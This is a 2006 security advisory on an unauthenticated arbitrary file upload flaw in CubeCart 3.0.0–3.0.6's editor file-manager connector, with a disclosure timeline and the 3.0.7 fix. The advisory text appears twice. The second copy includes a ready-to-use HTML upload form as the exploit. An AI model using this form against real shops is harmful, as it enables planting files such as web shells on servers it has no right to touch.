Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
CubeCart 3.0.0 ? 3.0.6
Site of manufacturer:
http://www.cubecart.com
The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/11/2005 - Answer of the manufacturer.
24/12/2005 - Patch.
29/12/2005 - New version CubeCart 3.0.7.
21/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/892.html
Risk:
Critical
Description:
Vulnerability exists because of insufficient check of authorization of the user
in the
script/includes/rte/editor/filemanager/browser/default/connectors/php/co
nnector.php.
Procedure of authorization include ("../includes/auth.inc.php" is not connected.
The removed user can by means of specially generated URL to load any files on target
system.
Influence:
Vulnerability allows the removed user loading of any files on system.
Decision:
Download patch or update new version 3.0.7
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!
NSAG-¹197-23.02.2006
Research:
NSA Group [Russian company on Audit of safety & Network security]
Site of Research:
http://www.nsag.ru or http://www.nsag.org
Product:
CubeCart 3.0.0 ? 3.0.6
Site of manufacturer:
http://www.cubecart.com
The status:
19/11/2005 - Publication is postponed.
19/11/2005 - Manufacturer is notified.
21/11/2005 - Answer of the manufacturer.
24/12/2005 - Patch.
29/12/2005 - New version CubeCart 3.0.7.
21/02/2006 - Publication of vulnerability.
Original Advisory:
http://www.nsag.ru/vuln/892.html
Risk:
Critical
Description:
Vulnerability exists because of insufficient check of authorization of the user
in the
script/includes/rte/editor/filemanager/browser/default/connectors/php/co
nnector.php.
Procedure of authorization include ("../includes/auth.inc.php" is not connected.
The removed user can by means of specially generated URL to load any files on target
system.
Influence:
Vulnerability allows the removed user loading of any files on system.
Exploit:
<form
action="http://host/cubedir/admin/includes/rte/editor/filemanager/browse
r/default/connectors/php/connector.php?Command=FileUpload&Type=File&Curr
entFolder=/"
method="POST" enctype="multipart/form-data">
File Upload<br>
<input id="txtFileUpload" type="file" name="NewFile">
<br>
<input type="submit" value="Upload">
</form>
Decision:
Download patch or update new version 3.0.7
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Our company is the independent auditor of the software in market IT.
At present independent audit of the software becomes the standard practice
and we suggest to make a let out product as much as possible protected from a various sort of attacks of malefactors!
www.nsag.ru
«Nemesis» © 2006
------------------------------------
Nemesis Security Audit Group © 2006.
[ reply ]